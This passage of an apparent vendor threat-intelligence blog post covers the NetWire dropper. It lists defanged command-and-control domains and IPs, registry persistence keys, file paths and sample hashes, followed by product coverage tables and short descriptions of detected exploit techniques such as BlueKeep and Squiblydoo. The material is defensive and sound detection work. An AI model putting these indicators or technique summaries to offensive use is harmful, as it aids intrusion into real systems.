Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Dropper.NetWire-9164792-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\WINRAR 7
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
7
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
7
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
7
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: NetWire
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{MWL6CFL3-Q618-6BKD-A3S6-62B587EIG42V} 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{MWL6CFL3-Q618-6BKD-A3S6-62B587EIG42V}
Value Name: StubPath
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{80C05YHJ-SE4K-3AO5-QWV7-76Q74G80K50I} 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: microsofts
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{80C05YHJ-SE4K-3AO5-QWV7-76Q74G80K50I}
Value Name: StubPath
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{74G121A4-RDHN-CC75-UK35-2O8372AD7026} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{74G121A4-RDHN-CC75-UK35-2O8372AD7026}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{016Y712U-4LBJ-3H75-8D8M-KK3WW07Q65Q5} 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: adobe2
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{016Y712U-4LBJ-3H75-8D8M-KK3WW07Q65Q5}
Value Name: StubPath
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Imgburn
1
Mutexes Occurrences
- 11
<random, matching [a-zA-Z0-9]{5,9}> 8
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
173[.]254[.]223[.]117 3
105[.]112[.]99[.]57 2
23[.]227[.]199[.]214 2
67[.]227[.]226[.]240 1
5[.]56[.]133[.]98 1
213[.]184[.]116[.]47 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
noch419[.]myftp[.]org 8
noch419[.]zapto[.]org 8
prensoland[.]ddns[.]net 2
nony3000[.]ddns[.]net 2
nonny3000[.]ddns[.]net 2
pornhouse[.]mobi 1
ithbault[.]com 1
felceconserve[.]com 1
sender455[.]ddns[.]net 1
grupocava-mx[.]com 1
Files and or directories created Occurrences
%APPDATA%\Install 15
%APPDATA%\Install\.Identifier 15
%APPDATA%\Install\Host.exe 13
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\drawname.vbs 8
%TEMP%\corelfolder 8
%TEMP%\corelfolder\drawname.exe 8
%LOCALAPPDATA%\Microsoft\Windows\WebCache\WebCacheV01.tmp 7
%TEMP%\-<random, matching '[0-9]{9}'>.bat 6
\TEMP\.Identifier 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\app.vbs 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\hhsghg.vbs 2
%TEMP%\Pictures 2
%TEMP%\Pictures\hhsghg.exe 2
%TEMP%\Win7x 2
%TEMP%\Win7x\app.exe 2
%APPDATA%\Install\netwire.exe 2
%TEMP%\subfolder 1
%TEMP%\subfolder\filename.scr 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbs 1
%TEMP%\802093.bat 1
%APPDATA%\adobe2 1
%APPDATA%\adobe2\pdf.exe 1
%APPDATA%\adobe2\.Identifier 1
%APPDATA%\Imgburnl 1
%APPDATA%\Imgburnl\ImgBurn.exe 1
*See JSON for more IOCs

File Hashes

08749bade577bfa92df7904bb8a146a687121d6153ed12b098ba668dcac49b8e 09099cde53b9ec037323f0d9ab82b8b0c713363d922b0c632935040586aa0a93 0c17a0cb945d50d7522e1970a5fd0b1c300602bb53e08b33e96a59b4807560ef 0d0d9163eb5227d3f451f5f4ee34e401d8882a8d71990192c66bf118847af2ec 215fa58ee9c00f5a23f331b910c5e992cbf94ee4338b0f81a051461cf2f7f198 250b810cfc08f764fe64253706c368a93d72a3f94599412265dd23c35221539d 27dfaf49362e5661f5a1555dd7d4bfd417e96091b546369ae69c40dab7069a67 2879a12ec400376386cf05bfd7e99cc3ab63ff565d552e0b89987b84a9fd436a 28da8e983a388bda854c1f4bdb7fcf6f89762f421f866c096571d735029167e3 430f8a219249f5151e1c010f5e12a1decefaede6254865dbea96a8bb86687ca1 5ca94a8724016bd252ae1eab571dc3f284db4622fe5e16098e5385eaa647e231 62db82c78f9ae72c0b3c5a61953f8ac30120d351a416acd0f253816dc694188e 6fc6198c488efc782bd4d67bffb924a3e317d0f7a65749d77209242837170126 7889a0d5eec069c45c0da71e3f94f9c144f7b3d1c5a61d71cb6a11f6e37f34da 92ae4ec3adbb6ae3f86fbc88b8144fd9eea9b88adec4ce9f9d92a943a195824e a1083a2e7b5bc329c7f70ef04bf5afbc0e712a495ad2d89626b185a002dd7180 aec65ae5f623adc8027b68c42da3cfb80f4d53c486dc198fc82483c21b669187 b911cef4b970aeb2fb7b0131baabfadd240b4d154dea1dd8343698e4f51790be b9c64e0aa71a3439aea071ce766833f7d422a7b6b528a9e6b7217af0fa7977c5 bda8b13fe58fe92afaeab2079d182fb4992d21897c6241c25739591d51214988 c25d4d2c0d09f06b1c7e83debc48fdd1a3b469630c8b18dd647679c73e9d082d cf953d7b94c05e4020925da1191d8142495e21f5eb60122dc26c402a1f7ab3eb d0061cacd685d7e29560e1aee5242851a94833d41779af52742cd6bc54766f62 d4d4435b3908aa2238ed1695e28ec70fb16bc3d7a7b00c1bdaa72f1e022bb86b d7d9c7a88ce09e393d8bf03f10dc7a8b46b16a40b0e75746d6ab331de6333a09
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Dealply adware detected - (16454)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
CVE-2019-0708 detected - (3369)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Crystalbit-Apple DLL double hijack detected - (2002)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Process hollowing detected - (1565)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Squiblydoo application whitelist bypass attempt detected. - (1103)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Trickbot malware detected - (738)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Excessively long PowerShell command detected - (524)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Installcore adware detected - (482)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Gamarue malware detected - (253)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Kovter injection detected - (175)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

No comments:

Post a Comment